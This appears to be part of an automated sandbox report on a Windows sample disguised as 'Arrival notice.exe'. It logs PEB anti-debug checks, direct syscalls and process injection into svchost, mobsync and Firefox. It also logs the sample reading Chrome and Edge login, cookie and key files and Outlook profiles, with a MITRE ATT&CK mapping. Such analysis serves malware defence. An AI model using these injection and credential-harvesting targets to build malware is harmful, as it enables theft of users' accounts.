            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C9179 mov eax, dword ptr fs:[00000030h]9_2_036C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705152 mov eax, dword ptr fs:[00000030h]9_2_03705152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov ecx, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C4144 mov eax, dword ptr fs:[00000030h]9_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03629148 mov eax, dword ptr fs:[00000030h]9_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03637152 mov eax, dword ptr fs:[00000030h]9_2_03637152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C156 mov eax, dword ptr fs:[00000030h]9_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03636154 mov eax, dword ptr fs:[00000030h]9_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660124 mov eax, dword ptr fs:[00000030h]9_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03631131 mov eax, dword ptr fs:[00000030h]9_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03631131 mov eax, dword ptr fs:[00000030h]9_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B136 mov eax, dword ptr fs:[00000030h]9_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov ecx, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA118 mov eax, dword ptr fs:[00000030h]9_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F0115 mov eax, dword ptr fs:[00000030h]9_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036551EF mov eax, dword ptr fs:[00000030h]9_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036351ED mov eax, dword ptr fs:[00000030h]9_2_036351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037061E5 mov eax, dword ptr fs:[00000030h]9_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036601F8 mov eax, dword ptr fs:[00000030h]9_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F61C3 mov eax, dword ptr fs:[00000030h]9_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366D1D0 mov eax, dword ptr fs:[00000030h]9_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]9_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037051CB mov eax, dword ptr fs:[00000030h]9_2_037051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E11A4 mov eax, dword ptr fs:[00000030h]9_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364B1B0 mov eax, dword ptr fs:[00000030h]9_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03670185 mov eax, dword ptr fs:[00000030h]9_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EC188 mov eax, dword ptr fs:[00000030h]9_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B019F mov eax, dword ptr fs:[00000030h]9_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A197 mov eax, dword ptr fs:[00000030h]9_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03687190 mov eax, dword ptr fs:[00000030h]9_2_03687190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705060 mov eax, dword ptr fs:[00000030h]9_2_03705060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov ecx, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641070 mov eax, dword ptr fs:[00000030h]9_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C073 mov eax, dword ptr fs:[00000030h]9_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632050 mov eax, dword ptr fs:[00000030h]9_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D705E mov ebx, dword ptr fs:[00000030h]9_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D705E mov eax, dword ptr fs:[00000030h]9_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B052 mov eax, dword ptr fs:[00000030h]9_2_0365B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A020 mov eax, dword ptr fs:[00000030h]9_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C020 mov eax, dword ptr fs:[00000030h]9_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F903E mov eax, dword ptr fs:[00000030h]9_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E016 mov eax, dword ptr fs:[00000030h]9_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036550E4 mov eax, dword ptr fs:[00000030h]9_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036550E4 mov ecx, dword ptr fs:[00000030h]9_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036380E9 mov eax, dword ptr fs:[00000030h]9_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C0F0 mov eax, dword ptr fs:[00000030h]9_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036720F0 mov ecx, dword ptr fs:[00000030h]9_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov ecx, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C0 mov eax, dword ptr fs:[00000030h]9_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037050D9 mov eax, dword ptr fs:[00000030h]9_2_037050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B20DE mov eax, dword ptr fs:[00000030h]9_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036590DB mov eax, dword ptr fs:[00000030h]9_2_036590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov eax, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F60B8 mov ecx, dword ptr fs:[00000030h]9_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363208A mov eax, dword ptr fs:[00000030h]9_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D08D mov eax, dword ptr fs:[00000030h]9_2_0362D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03635096 mov eax, dword ptr fs:[00000030h]9_2_03635096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D090 mov eax, dword ptr fs:[00000030h]9_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D090 mov eax, dword ptr fs:[00000030h]9_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366909C mov eax, dword ptr fs:[00000030h]9_2_0366909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B765 mov eax, dword ptr fs:[00000030h]9_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638770 mov eax, dword ptr fs:[00000030h]9_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640770 mov eax, dword ptr fs:[00000030h]9_2_03640770

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                NtOpenKeyEx: Direct from: 0x77672B9C
                NtProtectVirtualMemory: Direct from: 0x77672F9C
                NtCreateFile: Direct from: 0x77672FEC
                NtOpenFile: Direct from: 0x77672DCC
                NtTerminateThread: Direct from: 0x77672FCC
                NtProtectVirtualMemory: Direct from: 0x77667B2E
                NtQueryInformationToken: Direct from: 0x77672CAC
                NtAllocateVirtualMemory: Direct from: 0x77672BEC
                NtDeviceIoControlFile: Direct from: 0x77672AEC
                NtQuerySystemInformation: Direct from: 0x776748CC
                NtQueryAttributesFile: Direct from: 0x77672E6C
                NtSetInformationThread: Direct from: 0x77672B4C
                NtOpenSection: Direct from: 0x77672E0C
                NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                NtSetInformationThread: Direct from: 0x776663F9
                NtAllocateVirtualMemory: Direct from: 0x776748EC
                NtCreateKey: Direct from: 0x77672C6C
                NtReadVirtualMemory: Direct from: 0x77672E8C
                NtClose: Direct from: 0x77672B6C
                NtWriteVirtualMemory: Direct from: 0x7767490C
                NtAllocateVirtualMemory: Direct from: 0x77673C9C
                NtDelayExecution: Direct from: 0x77672DDC
                NtCreateUserProcess: Direct from: 0x7767371C
                NtQuerySystemInformation: Direct from: 0x77672DFC
                NtQueryInformationProcess: Direct from: 0x77672C26
                NtResumeThread: Direct from: 0x77672FBC
                NtReadFile: Direct from: 0x77672ADC
                NtAllocateVirtualMemory: Direct from: 0x77672BFC
                NtResumeThread: Direct from: 0x776736AC
                NtSetInformationProcess: Direct from: 0x77672C5C
                NtMapViewOfSection: Direct from: 0x77672D1C
                NtNotifyChangeKey: Direct from: 0x77673C2C
                NtCreateMutant: Direct from: 0x776735CC
                NtWriteVirtualMemory: Direct from: 0x77672E3C
            Source: C:\Users\user\Desktop\Arrival notice.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: read write
            Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 8112
            Source: C:\Users\user\Desktop\Arrival notice.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B7D008
            Source: C:\Users\user\Desktop\Arrival notice.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival notice.exe"
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
            Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
            Source: Arrival notice.exe | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock

            Stealing of Sensitive Information

            Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
